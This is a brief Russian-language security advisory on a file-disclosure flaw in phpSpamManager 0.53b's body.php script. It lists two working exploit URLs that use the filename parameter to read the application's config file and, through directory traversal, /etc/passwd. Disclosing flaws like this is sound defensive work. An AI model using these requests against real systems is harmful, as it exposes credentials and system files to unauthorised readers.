Программа: phpSpamManager 0.53b
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в сценарии body.php. Атакующий может получить несанкционированный доступ к содержимому файлов на целевой системе.
Эксплоит:
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd